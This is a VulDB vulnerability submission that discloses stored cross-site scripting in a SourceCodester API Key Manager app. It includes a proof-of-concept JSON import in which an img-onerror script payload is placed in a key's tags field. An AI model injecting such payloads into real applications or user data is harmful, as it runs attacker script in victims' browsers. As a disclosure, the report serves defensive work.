| Title | SourceCodester API Key Manager App Using HTML, CSS and JavaScript with Source Code 0 Cross Site Scripting |
|---|
| Description | The vulnerability lies in the import keys functionality where any user can define additional tags having JavaSctipt payloads. On load, the payload is executed within the local browser.
[
{
"id": "xss_tag_1",
"name": "Legitimate API Key",
"key": "sk_live_1234567890abcdef",
"category": "payment",
"tags": [
"production",
"<img src=x onerror=alert(1);>", // Exploit
"important"
],
"notes": "This key is used for production payments",
"created": "2026-01-03T17:41:04.147892Z",
"lastUsed": null,
"strength": "Strong"
}
]
Codebase: https://www.sourcecodester.com/javascript/18600/api-key-manager-app-using-html-css-and-javascript-source-code.html |
|---|
| User | Kamran Saifullah (UID 4218) |
|---|
| Submission | 01/03/2026 20:40 (3 months ago) |
|---|
| Moderation | 01/04/2026 07:47 (11 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 339472 [SourceCodester API Key Manager App 1.0 Import Key cross site scripting] |
|---|
| Points | 17 |
|---|